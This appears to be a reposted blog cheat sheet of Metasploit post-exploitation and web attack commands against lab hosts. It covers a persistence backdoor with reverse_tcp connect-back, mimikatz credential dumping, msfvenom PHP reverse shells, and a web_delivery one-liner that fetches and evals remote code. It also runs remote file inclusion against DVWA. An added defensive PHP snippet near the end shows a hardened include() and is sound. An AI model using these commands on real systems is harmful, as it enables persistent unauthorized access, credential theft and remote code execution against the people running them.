Moved to Minggle's Blog
###Local privilege escalation exploit detection
meterpreter > run post/multi/recon/local_exploit_suggester
###Migrate into a named process
migrate -N explorer.exe
###Automatic scripts
msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe  ##migrate into the named user process as soon as the session opens
msf exploit(multi/handler) > set InitialAutoRunScript migrate -n explorer.exe
msf exploit(multi/handler) > set AutoRunScript post/windows/gather/dumplinks  ##a post module can be used as the AutoRunScript as well
###Information gathering
meterpreter > run winenum  ##legacy Meterpreter script; current Metasploit releases replace it with the post/windows/gather/* modules
###Persistent backdoor
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -X -r 192.168.56.101 -p 4444 -i 10 -P windows/x64/meterpreter/reverse_tcp  ##-X and -S need elevated privileges on the target; the persistence script is legacy and current Metasploit uses exploit/windows/local/persistence instead
###mimikatz
meterpreter > load mimikatz  ##legacy v1 extension; newer Metasploit ships the kiwi extension (load kiwi)
meterpreter > mimikatz_command -f a::  ##a nonexistent module name makes mimikatz list the available modules
Module : 'a' not found
Available modules :
- Standard
crypto - Cryptography and certificates
hash - Hash
system - System management
process - Process manipulation
thread - Thread manipulation
service - Service manipulation
privilege - Privilege manipulation
handle - Handle manipulation
impersonate - Access token manipulation
winmine - Minesweeper manipulation
minesweeper - Minesweeper (Windows 7) manipulation
nogpo - Anti-GPO and miscellaneous patches
samdump - SAM dump
inject - Library injector
ts - Terminal Server
divers - Miscellaneous functions not yet substantial enough for a module of their own
sekurlsa - Dump of current sessions via the LSASS providers
efs - EFS manipulation
meterpreter > mimikatz_command -f winmine::infos  ##Minesweeper cheat: reveals the minefield
###Generating a PHP payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f raw -o a.php
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.56.101
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > set exitonsession no
msf exploit(multi/handler) > exploit -j
###Web Delivery
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set lhost 192.168.56.101
msf exploit(multi/script/web_delivery) > set URIPATH /
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set target 1  ##target 1 = PHP
msf exploit(multi/script/web_delivery) > set SRVPORT 7777
SRVPORT => 7777
msf exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 6.
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] Using URL: http://0.0.0.0:7777/
msf exploit(multi/script/web_delivery) > [*] Local IP: http://127.0.0.1:7777/
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.56.101:7777/'));"
Run on the target:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.56.101:7777/'));"
###Remote file inclusion
vim /etc/php5/cgi/php.ini  ##edit the php.ini of the SAPI that actually serves DVWA (apache2/php.ini for mod_php)
allow_url_fopen=On
allow_url_include=On
/etc/init.d/apache2 restart
msf > use exploit/unix/webapp/php_include
msf exploit(unix/webapp/php_include) > set HEADERS "Cookie:security=low; PHPSESSID=7b33e72386f301cd5f0439f308205f98"  ##DVWA needs a logged-in session cookie and the security level
msf exploit(unix/webapp/php_include) > set RHOST 192.168.56.104
msf exploit(unix/webapp/php_include) > set PATH /dvwa/vulnerabilities/fi/
msf exploit(unix/webapp/php_include) > set PHPURI /?page=XXpathXX
msf exploit(unix/webapp/php_include) > set payload php/meterpreter/reverse_tcp
msf exploit(unix/webapp/php_include) > set lhost 192.168.56.103
msf exploit(unix/webapp/php_include) > exploit
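The php_include module above only works because the target hands a request parameter straight to include(). As an added example (not code from the original post or from DVWA), the snippet below shows that endpoint in its vulnerable form next to a hardened version, and runs a few probe values through the hardened resolver from the CLI. The ./pages directory, the page names and the probe strings are assumptions for illustration.

```php
<?php
// Added example (not from the original post or DVWA): a file-inclusion
// endpoint in its vulnerable and hardened forms, seen from the target's side.
//
// Assumptions (hypothetical): pages live in a base directory and the request
// parameter is ?page=..., as in DVWA's /vulnerabilities/fi/?page=...

declare(strict_types=1);

// Vulnerable form: the raw parameter reaches include(). With allow_url_include=On
// this is remote file inclusion (?page=http://attacker/shell.txt); with it Off it
// is still local file inclusion (?page=../../../../etc/passwd).
function vulnerable_include(array $get): string
{
    $page = $get['page'] ?? 'home.php';
    ob_start();
    include $page;
    return (string) ob_get_clean();
}

// Hardened form: never let an attacker-controlled string reach include().
// Map the parameter onto a fixed allowlist of files and refuse everything else.
const PAGE_ALLOWLIST = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $page, string $baseDir): ?string
{
    $key = $page ?? 'home';
    if (!isset(PAGE_ALLOWLIST[$key])) {
        return null;                       // unknown key: nothing is included
    }
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_ALLOWLIST[$key]);
    $root = realpath($baseDir);
    // Defence in depth: the resolved file must exist and stay under the base directory.
    if ($path === false || $root === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function hardened_include(array $get, string $baseDir): string
{
    $path = resolve_page($get['page'] ?? null, $baseDir);
    if ($path === null) {
        http_response_code(404);
        return 'page not found';
    }
    ob_start();
    include $path;
    return (string) ob_get_clean();
}

// Stand-alone check (CLI only): build a scratch page directory, then feed the
// hardened resolver the payload shapes php_include and manual RFI/LFI use.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home.php', '<?php echo "home ok";');

    $probes = [                                                   // constructed inputs
        'home',
        'http://192.168.56.103/shell.txt',                        // RFI shape
        '../../../../etc/passwd',                                 // LFI shape
        'php://filter/convert.base64-encode/resource=index.php',  // wrapper shape
    ];
    foreach ($probes as $p) {
        $res = resolve_page($p, $dir);
        printf("%-60s -> %s\n", $p, $res === null ? 'REJECTED' : 'allowed');
    }
    echo hardened_include(['page' => 'home'], $dir), "\n";

    unlink($dir . '/home.php');
    rmdir($dir);
}
```

Run it with `php rfi_demo.php`: only the allowlisted key resolves, the URL, traversal and php:// probes are all rejected before include() is reached, and the hardened endpoint still renders the page. The allowlist is what closes the hole; the realpath check only guards against a future mistake in the allowlist itself.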
Source: CSDN
Author: tianyazm
Link: https://blog.csdn.net/tianyazm/article/details/79315228